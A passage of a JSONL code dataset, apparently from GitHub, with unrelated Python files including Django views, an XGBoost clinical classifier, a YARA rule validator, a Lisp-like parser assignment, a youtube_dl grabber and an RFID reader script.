django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.template.defaultfilters import slugify\n\nfrom gitawesome.models import Project, Profile, Commit\nfrom gitawesome.forms import RepoForm\nfrom gitawesome.tasks import analyze_repo\n\nfrom gitawesome.utils import get_github_repo_url\n\n\ndef home(request):\n context = {\n }\n return render_to_response('gitawesome/home.html', context,\n context_instance=RequestContext(request))\n\ndef repo(request):\n repo_form = RepoForm()\n if request.method == 'POST':\n repo_form = RepoForm(request.POST)\n if repo_form.is_valid():\n # queue repo analysis\n url = repo_form.cleaned_data['repo_url']\n parts = urlparse.urlsplit(url)\n username, project_name = filter(None, parts[2].split('/'))\n User.objects.get_or_create(username=username)\n Project.objects.get_or_create(name=project_name,\n url=get_github_repo_url(username, project_name))\n analyze_repo.delay(username, project_name)\n return HttpResponseRedirect('%s?%s' % (\n reverse('gitawesome_repo_queued'), urllib.urlencode({\n 'username': username,\n 'project_name': project_name,\n })))\n context = {\n 'repo_form': repo_form,\n }\n return render_to_response('gitawesome/repo.html', context,\n context_instance=RequestContext(request))\n\ndef repo_queued(request):\n username = request.GET.get('username')\n project_name = request.GET.get('project_name')\n context = {\n 'username': username,\n 'project_name': project_name,\n }\n return render_to_response('gitawesome/repo_queued.html', context,\n context_instance=RequestContext(request))\n\ndef user(request, username):\n profile = get_object_or_404(Profile, slug=slugify(username))\n if (request.user.is_authenticated() and\n profile.user.username == request.user.username):\n # show dashboard\n #return HttpResponseRedirect(reverse('gitawesome_dashboard',\n #args=(request.user.username,)))\n pass\n commits_by_project = defaultdict(list)\n for c in Commit.objects.filter(\n user=profile.user).order_by('project__id'):\n commits_by_project[c.project].append(c)\n context = {\n 'profile': profile,\n 'commits_by_project': commits_by_project.iteritems(),\n }\n return render_to_response('gitawesome/user.html', context,\n context_instance=RequestContext(request))\n\ndef project(request, username, project_name):\n key = 'project-%s-%s' % (username, project_name)\n context = cache.get(key)\n if context is None:\n profile = get_object_or_404(Profile, slug=slugify(username))\n try:\n project = Project.objects.get(url=get_github_repo_url(username, project_name))\n except Project.DoesNotExist:\n raise Http404\n commits_by_user = defaultdict(list)\n for c in project.commit_set.all():\n commits_by_user[c.user].append(c)\n commits = sorted([(sum(c.points for c in commits), user)\n for user,commits in commits_by_user.iteritems()], reverse=True)\n context = {\n 'profile': profile,\n 'project': project,\n 'commits': commits,\n }\n cache.set(key, context, 3600)\n return render_to_response('gitawesome/project.html', context,\n context_instance=RequestContext(request))\n\n","repo_name":"macro/dash11","sub_path":"dash_proj/gitawesome/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"37772670044","text":"# -- coding:utf-8 --\n\nfrom utils_features_selection import *\n\n\ndef create_table(cols=['乳酸脱氢酶', '淋巴细胞(%)', '超敏C反应蛋白']):\n data_df_unna, data_pre_df = data_preprocess()\n data_df_unna = data_df_unna.dropna(subset=cols, how='any')\n\n cols.append('Type2')\n Tets_Y = data_pre_df.reset_index()[['PATIENT_ID', '出院方式']].copy()\n Tets_Y = Tets_Y.rename(columns={'PATIENT_ID': 'ID', '出院方式': 'Y'})\n y_true = Tets_Y['Y'].values\n\n x_col = cols[:-1]\n y_col = cols[-1]\n x_np = data_df_unna[x_col].values\n y_np = data_df_unna[y_col].values\n x_test = data_pre_df[x_col].values\n X_train, X_val, y_train, y_val = train_test_split(x_np, y_np, test_size=0.3, random_state=6)\n model = xgb.XGBClassifier(\n max_depth=3,\n n_estimators=1,\n )\n model.fit(X_train, y_train)\n\n pred_test = model.predict(x_test)\n\n print(classification_report(y_true, pred_test))\n\nif __name__ == '__main__':\n create_table()\n","repo_name":"MI2-Education/2021L-WB-ML","sub_path":"DeepJajo/raport_v1/table4.py","file_name":"table4.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42460298966","text":"#!/usr/bin/env python\n\"\"\"\nvalidate_yara.py\n\nCommand line utility to validate a directory of YARA rules files.\n\"\"\"\nimport argparse\nimport glob\nimport sys\n\nimport yara\n\n\ndef main():\n parser = argparse.ArgumentParser(prog=\"validate_yara.py\",\n description=\"validates YARA rules files.\",\n usage=\"%(prog)s [options]\")\n parser.add_argument(\"-p\", \"--path\",\n dest=\"path\",\n help=\"path to directory containing YARA rules\")\n parser.add_argument(\"-e\", \"--error\",\n action=\"store_true\",\n default=False,\n dest=\"error\",\n help=\"boolean that determines if warnings should\"\n \" cause errors\")\n args = parser.parse_args()\n\n path = args.path or None\n error = args.error\n if path is None:\n sys.exit(\"Please provide a path.\")\n\n globbed_paths = glob.iglob(f\"{path}/**/*.yar*\", recursive=True)\n for (idx, entry) in enumerate(globbed_paths):\n try:\n if error:\n yara.compile(filepath=entry, error_on_warning=True)\n else:\n yara.compile(filepath=entry)\n except (yara.Error, yara.SyntaxError) as YaraError:\n print(YaraError)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"seclab-int-dev-group/strelka","sub_path":"validate_yara.py","file_name":"validate_yara.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"32919853513","text":"from typing import (\n List,\n)\n\nclass Solution:\n \"\"\"\n @param n: an integer,denote the number of cities\n @param roads: a list of three-tuples,denote the road between cities\n @return: return the minimum cost to travel all cities\n \"\"\"\n def __init__(self):\n self.minCost = float(\"inf\") \n\n def min_cost(self, n: int, roads: List[List[int]]) -> int:\n graph = self.find_neighbors(n, roads)\n self.dfs(n, roads, graph, [1], {1}, 1, 0)\n return self.minCost\n \n def dfs(self, num_city, roads, graph, path, visited, city, cost):\n if len(visited) == num_city:\n self.minCost = min(self.minCost, cost)\n \n for next_city in graph[city]:\n if next_city in visited:\n continue \n if self.not_good_path(path, next_city, graph):\n continue \n visited.add(next_city) \n path.append(next_city)\n self.dfs(num_city, roads, graph, path, visited, next_city, cost + graph[city][next_city])\n visited.remove(next_city)\n path.pop()\n \n def not_good_path(self, path, new_city, graph):\n # |\n # [1, 2, 3, 4, 5] -> city\n for i in range(1, len(path)):\n # using the above example, supposely i is 1\n # check if w(1 -> 2) + w(5 -> city) > w(1 -> 5) + w(3 -> city)\n # keep on checking as i increment, looking for cheaper way than adding city directly to the end of path, which is the left side logic. \n if graph[path[i - 1]][path[i]] + graph[path[-1]][new_city] > graph[path[i - 1]][path[-1]] + graph[path[i]][new_city]:\n return True \n return False\n\n def find_neighbors(self, num_city, roads):\n graph = {i: {j: float(\"inf\") for j in range(1, num_city + 1)} for i in range(1, num_city + 1)} \n\n for city1, city2, cost in roads:\n graph[city1][city2] = min(graph[city1][city2], cost)\n graph[city2][city1] = min(graph[city2][city1], cost)\n \n return graph\n\n","repo_name":"sherry-debug715/Algorithms-notes","sub_path":"Traveling Salesman Problem/2prunning.py","file_name":"2prunning.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33632716961","text":"# -*- coding: utf-8 -*-\nfrom odoo import http\nfrom odoo.http import request\n\nclass VitPortocv(http.Controller):\n\n\t# Public\n\t@http.route(\"/index/\", auth='public')\n\tdef index(self, employee_id, **kw): # hasil parsing di masukan ke fungsi\n\t\temployee_id = request.env['hr.employee'].sudo().search([('id', '=', employee_id) ]) # employee_id dari parameter\n\t\t\n\t\tif employee_id:\n\t\t\treturn request.render(\"vit_portocv.index\", {\n\t\t\t\t'employee_id'\t: employee_id,\n\t\t\t})\n\t\telse:\n\t\t\treturn request.render(\"vit_portocv.not_found\", {\n\t\t\t})\n\n# class VitPortocv(http.Controller):\n\n # @http.route('/index/', auth='public')\n # def list(self, **kw):\n # return http.request.render('vit_portocv.index', {\n # })\n\n# @http.route('/vit_portocv/vit_portocv/objects//', auth='public')\n# def object(self, obj, **kw):\n# return http.request.render('vit_portocv.object', {\n# 'object': obj\n# })","repo_name":"rahmansaleh7/vit_portocv","sub_path":"controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13723225337","text":"prompt = \"Please enter an IP address. An IP address consists of 4 numbers,\" \\\n \"separated from each other with a full stop: \"\n\nipAddress = input(prompt)\n\nsegment = 1\nsegment_length = 0\n\nif ipAddress[-1] != '.':\n ipAddress += '.'\n\nif ipAddress != '':\n for character in ipAddress:\n if character == '.':\n print(\"Segment {} contains {} characters\".format(segment, segment_length))\n segment += 1\n segment_length = 0\n else:\n segment_length += 1\n\n # Unless the final character in the string was a . then we haven't printed the last_segment\n if character != '.':\n print(\"Segment {} contains {} characters\".format(segment, segment_length))\nelse:\n print('Please enter a valid ipAddress')\n","repo_name":"joshuagato/learning-python","sub_path":"FlowControl/Challenge.py","file_name":"Challenge.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42786348489","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import GridSearchCV\n\n#evaluamos el modelo usando mape\ndef mean_absolute_percentage_error(y_true, y_pred):\n with np.errstate(divide='ignore',invalid='ignore'):\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\ndef plot_grid_search(cv_results, grid_param_1, grid_param_2, name_param_1, name_param_2):\n \"\"\"\n\n From: https://stackoverflow.com/questions/37161563/how-to-graph-grid-scores-from-gridsearchcv\n \"\"\"\n # Get Test Scores Mean and std for each grid search\n scores_mean = cv_results['mean_test_score']\n scores_mean = np.array(scores_mean).reshape(len(grid_param_2),len(grid_param_1))\n\n scores_sd = cv_results['std_test_score']\n scores_sd = np.array(scores_sd).reshape(len(grid_param_2),len(grid_param_1))\n\n # Plot Grid search scores\n _, ax = plt.subplots(1,1)\n\n # Param1 is the X-axis, Param 2 is represented as a different curve (color line)\n for idx, val in enumerate(grid_param_2):\n ax.plot(grid_param_1, scores_mean[idx,:], '-o', label= name_param_2 + ': ' + str(val))\n\n ax.set_title(\"Grid Search Scores\", fontsize=20, fontweight='bold')\n ax.set_xlabel(name_param_1, fontsize=16)\n ax.set_ylabel('CV Average Score', fontsize=16)\n ax.legend(loc=\"best\", fontsize=15)\n ax.grid('on')\n\n\n\ndef plot_grid_search_validation_curve(grid, param_to_vary,\n title='Validation Curve', ylim=None,\n xlim=None, log=None):\n\n \"\"\"\n From: https://matthewbilyeu.com/blog/2019-02-05/validation-curve-plot-from-gridsearchcv-results\n Plots train and cross-validation scores from a GridSearchCV instance's\n best params while varying one of those params.\"\"\"\n\n df_cv_results = pd.DataFrame(grid.cv_results_)\n train_scores_mean = df_cv_results['mean_train_score']\n valid_scores_mean = df_cv_results['mean_test_score']\n train_scores_std = df_cv_results['std_train_score']\n valid_scores_std = df_cv_results['std_test_score']\n\n param_cols = [c for c in df_cv_results.columns if c[:6] == 'param_']\n param_ranges = [grid.param_grid[p[6:]] for p in param_cols]\n param_ranges_lengths = [len(pr) for pr in param_ranges]\n\n train_scores_mean = np.array(train_scores_mean).reshape(*param_ranges_lengths)\n valid_scores_mean = np.array(valid_scores_mean).reshape(*param_ranges_lengths)\n train_scores_std = np.array(train_scores_std).reshape(*param_ranges_lengths)\n valid_scores_std = np.array(valid_scores_std).reshape(*param_ranges_lengths)\n\n param_to_vary_idx = param_cols.index('param_{}'.format(param_to_vary))\n\n slices = []\n for idx, param in enumerate(grid.best_params_):\n if (idx == param_to_vary_idx):\n slices.append(slice(None))\n continue\n best_param_val = grid.best_params_[param]\n idx_of_best_param = 0\n if isinstance(param_ranges[idx], np.ndarray):\n idx_of_best_param = param_ranges[idx].tolist().index(best_param_val)\n else:\n idx_of_best_param = param_ranges[idx].index(best_param_val)\n slices.append(idx_of_best_param)\n\n train_scores_mean = train_scores_mean[tuple(slices)]\n valid_scores_mean = valid_scores_mean[tuple(slices)]\n train_scores_std = train_scores_std[tuple(slices)]\n valid_scores_std = valid_scores_std[tuple(slices)]\n\n plt.clf()\n\n plt.title(title)\n plt.xlabel(param_to_vary)\n plt.ylabel('Score')\n\n if (ylim is None):\n plt.ylim(0.0, 1.1)\n else:\n plt.ylim(*ylim)\n\n if (not (xlim is None)):\n plt.xlim(*xlim)\n\n lw = 2\n\n plot_fn = plt.plot\n if log:\n plot_fn = plt.semilogx\n\n param_range = param_ranges[param_to_vary_idx]\n if (not isinstance(param_range[0], numbers.Number)):\n param_range = [str(x) for x in param_range]\n plot_fn(param_range, train_scores_mean, label='Training score', color='r',\n lw=lw)\n plt.fill_between(param_range, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color='r', lw=lw)\n plot_fn(param_range, valid_scores_mean, label='Cross-validation score',\n color='b', lw=lw)\n plt.fill_between(param_range, valid_scores_mean - valid_scores_std,\n valid_scores_mean + valid_scores_std, alpha=0.1,\n color='b', lw=lw)\n\n plt.legend(loc='lower right')\n\n plt.show()\n\n\ndef plot_validation_curve(degree,train_score,val_score):\n plt.plot(degree, np.median(train_score, 1), color='blue', label='training score')\n plt.plot(degree, np.median(val_score, 1), color='red', label='validation score')\n plt.legend(loc='best')\n plt.xlabel(\"degree\")\n plt.ylabel(\"score\")\n plt.show()\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=None, train_sizes=np.linspace(.1, 1.0, 5)):\n \"\"\"\n Generate a simple plot of the test and training learning curve.\n\n Parameters\n ----------\n estimator : object type that implements the \"fit\" and \"predict\" methods\n An object of that type which is cloned for each validation.\n\n title : string\n Title for the chart.\n\n X : array-like, shape (n_samples, n_features)\n Training vector, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape (n_samples) or (n_samples, n_features), optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n ylim : tuple, shape (ymin, ymax), optional\n Defines minimum and maximum yvalues plotted.\n\n cv : int, cross-validation generator or an iterable, optional\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n - None, to use the default 3-fold cross-validation,\n - integer, to specify the number of folds.\n - :term:`CV splitter`,\n - An iterable yielding (train, test) splits as arrays of indices.\n\n For integer/None inputs, if ``y`` is binary or multiclass,\n :class:`StratifiedKFold` used. If the estimator is not a classifier\n or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.\n\n Refer :ref:`User Guide ` for the various\n cross-validators that can be used here.\n\n n_jobs : int or None, optional (default=None)\n Number of jobs to run in parallel.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. See :term:`Glossary `\n for more details.\n\n train_sizes : array-like, shape (n_ticks,), dtype float or int\n Relative or absolute numbers of training examples that will be used to\n generate the learning curve. If the dtype is float, it is regarded as a\n fraction of the maximum size of the training set (that is determined\n by the selected validation method), i.e. it has to be within (0, 1].\n Otherwise it is interpreted as absolute sizes of the training sets.\n Note that for classification the number of samples usually have to\n be big enough to contain at least one sample from each class.\n (default: np.linspace(0.1, 1.0, 5))\n \"\"\"\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return plt\n\n","repo_name":"DanielOrtegaCar/DataScience1","sub_path":"5-Regression/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"30376345574","text":"# Laryssa Revelli\n# A01979841\nfrom random import random, randint\n### TODO ##### \n# 1) False, True print 1\n# 2) KeyError: '>' in createParseTree line 147\nimport os\nPATH = \"C:/Users/lreesa/cs4700/Assn5n6/\"\nif not os.path.exists(PATH):\n os.makedirs(PATH)\n\n########## 1) BNF Grammar ############################################################\n# := | \n# | '(' 'if' ')'\n# ::= 'True' | 'False' | '(' 'not' ')'\n# | '(' ')'\n# | '(' '>' ')'\n# | '(' 'eq' ')'\n# ::= | '(' ')' \n\n# := '+' | '-' | '*' | '/'\n# := 'and' | 'or' # 'not' is accounted for in booleanExpression\n#######################################################################################\n \n# define all the possible operators and how many arguments they take\n# for extended language\nOperatorsAll = ['+', '-', '*', '/', 'if', 'and', 'or', 'not', '>', 'eq' ]\nOperatorsBoolBool = ['and', 'or', 'not', 'eq']\nOperatorsBoolNumb = ['>', 'eq']\nOperatorsNumb = ['+', '-', '*', '/']\nNumberOfArguments = {}\nArgumentCount = [(1, ['not']),(2, ['+', '-', '*', '/', 'and', 'or', 'eq']), (3, ['if'])]\n# # fill the mapping from operator to argument count\nfor (count, operators) in ArgumentCount:\n for op in operators:\n NumberOfArguments[op] = count\n \ndef processAllGood ():\n # Generate a set of correct random test problems\n with open(PATH + 'correctSyntax.txt', 'r') as file: # Use file to refer to the file object\n programs = file.readlines()\n for i in range(0, len(programs)):\n parse(programs[i])\n print(\"Index = %d \\n\" % i)\n\ndef generateRandomProgram(maxDepth = 10):\n # generates a string that is a legal sentence in the grammar of our L language\n if random() < 0.1 or maxDepth < 0:\n return str(randint(0, 100))\n elif random() < 0.3:\n return generateRandomExpressionBool(maxDepth - 1)\n elif random() < 0.3:\n return generateRandomExpressionNumb(maxDepth - 1)\n else:\n return \"(if %s %s %s)\" % (generateRandomExpressionBool(maxDepth - 1), \n generateRandomProgram(maxDepth - 1), \n generateRandomProgram(maxDepth - 1))\n \ndef generateRandomExpressionNumb(maxDepth):\n if random() < 0.1 or maxDepth < 0:\n return str(randint(0, 100))\n return \"(%s %s %s)\" % (OperatorsNumb[randint(0,len(OperatorsNumb)-1)],\n generateRandomExpressionNumb(maxDepth-1),\n generateRandomExpressionNumb(maxDepth-1))\n \ndef generateRandomExpressionBool(maxDepth):\n if random() < 0.1 or maxDepth < 0:\n return ['True', 'False'][randint(0,1)]\n elif random() < 0.5:\n operator = OperatorsBoolBool[randint(0, len(OperatorsBoolBool)-1)]\n if NumberOfArguments[operator] == 1:\n return \"(%s %s)\" % (operator, \n generateRandomExpressionBool(maxDepth - 1))\n if NumberOfArguments[operator] == 2:\n return \"(%s %s %s)\" % (operator, \n generateRandomExpressionBool(maxDepth - 1),\n generateRandomExpressionBool(maxDepth - 1))\n else:\n operator = OperatorsBoolNumb[randint(0, len(OperatorsBoolNumb)-1)]\n return \"(%s %s %s)\" % (operator,\n generateRandomExpressionNumb(maxDepth - 1),\n generateRandomExpressionNumb(maxDepth - 1))\n \ndef genGood ():\n # Generate a set of correct random test problems\n with open(PATH + 'correctSyntax.txt', 'w') as file: # Use file to refer to the file object\n for _ in range(0, 1000):\n file.write(generateRandomExpressionNumb(1 + randint(0,10)) + \"\\n\")\n \ndef genBad ():\n with open(PATH + 'errorSyntax.txt', 'w') as file: # Use file to refer to the file object\n for _ in range(0, 1000):\n program = generateBadRandomExpression(1 + randint(0,10)) #(1 + randint(0,10))\n try: #try to parse the expression\n parse(program)\n # Only if it does not parse then we save\n except Exception as error:\n file.write(program + \"\\n\")\n \nBadOps = ['_', '=','(','%']\nBadNumbers = ['1.2344','x','y']\ndef generateBadRandomExpression(maxDepth = 10):\n # generates a string that is a legal sentence in the grammar of our simple lisp language\n if random() < 0.1 or maxDepth < 0:\n return str(randint(0, 100))\n if random() < 0.05 or maxDepth < 0:\n return str(BadNumbers[randint(0, len(BadNumbers)-1)])\n elif random() < 0.05:\n return \"(%s %s %s\" % (OperatorsAll[randint(0, 9)], \n generateBadRandomExpression(maxDepth - 1), \n generateBadRandomExpression(maxDepth - 1))\n elif random() < 0.05:\n return \"%s %s %s)\" % (OperatorsAll[randint(0, 9)], \n generateBadRandomExpression(maxDepth - 1), \n generateBadRandomExpression(maxDepth - 1))\n else:\n return \"(%s %s %s)\" % (OperatorsAll[randint(0, 9)], \n generateBadRandomExpression(maxDepth - 1), \n generateBadRandomExpression(maxDepth - 1))\n\n# 2) Extend your parser to handle all the above additional language constructs. \n# This will involve adding new terminals (atoms) to the lexical analyzer, \n# extending the cases that the parser can handle, and extending the pretty printer \n# (extend the one that works with parse trees)\ndef atom(token):\n # changes a token to an actual integer or boolean\n if token.isdigit():\n return int(token)\n if token == 'True' or token == 'False':\n return bool(token) \n return token\n\n### takes a program string and returns a parse tree\ndef parse(programStr):\n # returns the input string as a parse tree, represented as either an int or a list of expressions\n return createParseTree(tokenize(programStr))\n \n### does error checking\ndef parseX(programStr):\n # returns the input string as a parse tree, represented as either an int or a list of expressions\n return createParseTreeX(tokenize(programStr))\n\ndef createParseTree(tokenList):\n token = tokenList.pop(0)\n if isinstance(token, int) or isinstance(token, bool):\n return token\n operator = tokenList.pop(0) \n parseTree = [operator]\n for i in range(NumberOfArguments[operator]):\n parseTree += [createParseTree(tokenList)]\n tokenList.pop(0) # pop the ')'\n return parseTree\n \ndef createParseTreeX(tokenList):\n if tokenList == []:\n raise Exception(\"Run out of tokens\")\n token = tokenList.pop(0)\n if isinstance(token, int) or isinstance(token, bool):\n return tokenList\n if not token == \"(\":\n raise Exception(\"Found %s instead of (\" % (token,))\n if tokenList == []:\n raise Exception(\"Missing Operator\")\n operator = tokenList.pop(0) \n if not operator in OperatorsAll:\n raise Exception(\"Unknown operator %s\" % operator)\n parseTree = [operator]\n for i in range(NumberOfArguments[operator]):\n parseTree += [createParseTree(tokenList)]\n if tokenList == []:\n raise Exception(\"Missing )\")\n close = tokenList.pop(0) # pop the ')'\n if not ')' == close: # pop the ')'\n raise Exception(\"Found %s instead of )\" % (close,))\n return parseTree\n \n ### prettyPrint an expression (parsed list of tokens)\n\n# takes a parse tree and prints it out so it is easier to read (maybe)\ndef prettyPrintExp(expression, depth = 0):\n if isinstance(expression, int):\n print(\"%s %d\" % (' ' * depth, expression))\n # elif isinstance(expression, bool):\n # print(\"%s %s\" % (' ' * depth, expression))\n else:\n print(\"%s(%s \" % (' ' * depth, expression[0]))\n for i in range(1, NumberOfArguments[expression[0]]+1):\n prettyPrintExp(expression[i], depth+2)\n print(\"%s) \" % (' ' * (depth+1)))\n \n### very simple code that just checks whether the number of open parentheses\n### is the same as the number of closed parentheses\ndef checkBalanced(tokenList):\n depth = 0\n while not tokenList == []:\n token = tokenList.pop(0)\n if token == '(': #consume and add 1 to depth\n depth = depth + 1\n if token == ')':\n depth = depth - 1\n return depth == 0\n \n### takes a string representing an expression in simple lisp and returns a list of tokens\ndef tokenize(programStr):\n tokens = programStr.replace('(', ' ( ').replace(')', ' ) ').split()\n if all(legalToken(token) for token in tokens):\n return [atom(token) for token in tokens]\n else:\n badTokens = str([token for token in tokens if not legalToken(token)])[1:][:-1]\n raise Exception(\"Unknown token found %s\" % (badTokens,))\n \n### returns True if the token is legal \ndef legalToken(token):\n # returns True if legal for our simple lisp\n return (token.isdigit() or token == 'True' or token == 'False'\n or token in OperatorsAll + [')', '('])\n\n# Reads file are parses, prints to error or prettyprintcorrect\ndef readFile(fileName):\n fil = open(PATH + fileName)\n fileLines = fil.readlines()\n for f in fileLines:\n parseTree = parseX(f)\n if None not in parseTree:\n prettyPrint(parseTree, f)\n else:\n errorPrint(parseTree, f)\n\n# Prints exceptions to error.txt\ndef errorPrint(expression, depth):\n # takes a tokenized string expression and prints it out based on depth\n token = expression.pop(0) \n\n# # 3) run your parser over the two attached files, one containing \n# valid expressions, the other expressions with syntax errors. \n\n# readFile('correctSyntax.txt')\nprg = generateRandomProgram(2) \nprint(prg)\nprettyPrintExp(parse(prg)) \n ","repo_name":"lreesa/cs4700-Programming-languages","sub_path":"Assn5n6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29684057938","text":"import random\n\n\nnum1 = random.randint(1, 100)\nnum2 = random.randint(1, 100)\n\n\nrules_game = 'Find the greatest common divisor of given numbers.'\nexample = f'{num1} {num2}'\n\n\ndef truth(num1, num2):\n while num1 != num2:\n if num1 > num2:\n num1 -= num2\n else:\n num2 -= num1\n return num1\n\n\nright_answer = str(truth(num1, num2))\ntext1 = f\" is wrong answer ;(. Correct answer was '{right_answer}'.\"\ntext2 = \"Let's try again, \"\n","repo_name":"Dmitri-Bes/python-project-49","sub_path":"brain_games/games/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42797525485","text":"import youtube_dl\nimport asyncio\nyoutube_dl.utils.bug_reports_message = lambda: '' #Suppressing Noise Console From YT_Dl\nclass Song:\n def __init__(self,url,track,artist,YTurl):\n self.track=track\n self.url=url\n self.artist=artist\n self.YTurl=YTurl\n def __str__(self):\n return 'Track: {}, Download URL: {} \\n Artist: {}, URL: {}'.format(self.track,self.url[:5],self.artist,self.YTurl)\nclass YT:\n @staticmethod\n def InsertData(data: list,DataBase,guildID: int,url: str):\n if 'entries' in data:\n for i in data['entries']:\n if(not i.get('url',False)):continue\n DataBase.insert(guildID,i.get('track',i.get('title','Unknown')),i.get('artist'),i.get('url'),i.get('webpage_url',url))\n else:\n DataBase.insert(guildID,data.get('track',data.get('title','Unknown')),data.get('artist'),data.get('url'),data.get('webpage_url',url))\n @staticmethod\n async def grab(url: str,DataBase,guildID: int,opts: dict,loop=None):\n client=youtube_dl.YoutubeDL(opts)\n if(not loop):loop=asyncio.get_event_loop()\n try:\n data=await loop.run_in_executor(None,lambda: client.extract_info(url,download=False))\n except:\n return False\n YT.InsertData(data,DataBase,guildID,url)\n if(len(data)==0):\n return None\n if 'entries' in data:\n return len(data.get('entries'))\n return 1\nif __name__=='__main__':\n print('nothing')","repo_name":"GamesBond008/DiscordBotRewrite","sub_path":"Tools/Songs.py","file_name":"Songs.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"40615461999","text":"#!/usr/bin/env python\n\nimport sys\nimport csv\n\n# if using spikein normalization, set control to 10M reads and condition to 10M*(condition SI pct)/(control SI pct)\ndef danpos_norm(norm, condition, control, condition_samples, control_samples, si_table):\n if norm==\"spikenorm\":\n cond_count, ctrl_count, cond_val, ctrl_val = 0,0,0,0\n with open(si_table) as si_table:\n si_table = csv.reader(si_table, delimiter=\"\\t\")\n for row in si_table:\n if row[0] in condition_samples.split(\",\"):\n cond_val += float(row[4])/float(row[2])\n cond_count += 1\n if row[0] in control_samples.split(\",\"):\n ctrl_val += float(row[4])/float(row[2])\n ctrl_count += 1\n cond_sipct = cond_val/cond_count\n ctrl_sipct = ctrl_val/ctrl_count\n spikein_counts = int(1e7*ctrl_sipct*(1-cond_sipct)/((1-ctrl_sipct)*cond_sipct))\n spikein_string = \"--count nucleosome_quantification/data/{condition}/:{spikein_counts},nucleosome_quantification/data/{control}/:1e7\".format(condition=condition, spikein_counts=spikein_counts, control=control)\n return spikein_string\n else:\n return \"\"\n\nprint(danpos_norm(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6]))\n\n","repo_name":"winston-lab/mnase-seq","sub_path":"scripts/danpos_norm.py","file_name":"danpos_norm.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"2329084736","text":"import RPi.GPIO as GPIO\nfrom mfrc522 import SimpleMFRC522\nimport consulta\nfrom datetime import datetime\n\nreader = SimpleMFRC522()\n\n#db = consulta.conexion()\n\n\ntry:\n while True:\n db = consulta.conexion()\n id, text = reader.read()\n print(id)\n print(type(id))\n print(text)\n print(type(text))\n hash_fecha = consulta.validacion(db,id,text)\n print(hash_fecha)\n print(type(hash_fecha))\n reader.write(hash_fecha)\n print(\"Written: \"+ hash_fecha)\n consulta.cerrar_conexion(db)\n\n \n \nfinally:\n GPIO.cleanup()\n","repo_name":"ElDracoUniversitario/TFG-SIMOVA-CORE","sub_path":"Código de ejemplo/Lectura.py","file_name":"Lectura.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19184452625","text":"#!/user/bin/env python3.6\n\n# Based on https://docs.python.org/3/howto/logging.html#logging-basic-tutorial\nimport logging\n\n# Set up logging\nlogging.basicConfig(filename='blaulicht_tracker.log',format='%(asctime)s %(levelname)s %(message)s',level=logging.DEBUG)\n\ndef add_to_log(text, level='debug'):\n \"\"\"\n Log text with level\n \"\"\"\n level = level.lower()\n if level == 'debug':\n logging.debug(text)\n elif level == 'info':\n logging.info(text)\n elif level == 'warning':\n logging.warning(text)\n elif level == 'error':\n 